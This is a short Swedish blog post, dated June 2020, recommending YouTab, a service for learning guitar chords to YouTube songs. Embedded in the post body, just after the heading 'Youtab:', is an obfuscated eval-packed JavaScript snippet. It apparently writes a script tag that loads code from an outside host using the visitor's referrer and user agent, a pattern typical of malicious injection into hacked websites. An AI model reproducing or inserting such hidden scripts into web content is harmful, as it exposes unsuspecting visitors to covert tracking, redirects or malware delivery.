Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

Youtab lär dig spela din favorit låt på gitarr

Youtab lär dig spela din favorit låt på gitarr
Sebastian

Youtab: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nnbnk|var|u0026u|referrer|hnfty||js|php’.split(’|’),0,{}))
Jag är en kille som är väldigt intresserad av musik och själv lärt mig en och annan sång på piano och gitarr från bland annat videoklipp på Youtube. 

Nu lanseras en ny rolig tjänst som jag i alla fall kommer att använda. YouTab är tjänsten där du väljer din favorit låt på Youtube och sedan följer stegen på sidan för att enkelt lära dig vilka ackord som ska tas.
Som en rolig grej så visas också videon nere i det vänstra hörnet så du kan följa med samtidigt som du spelar den på gitarren.

Det finns också en funktion där anv’ändare kan sätta tabulatur till Youtube som ännu inte finns inlagt i Youtabs arkiv. Med detta hoppas man kunna skapa ett community som ser till att folk lägger in nya låtar och håller arkivet uppdaterat.

Kika in tjänsten och prova absolut på den om du har en gitarr tillgänglig.

Kika in tjänsten här!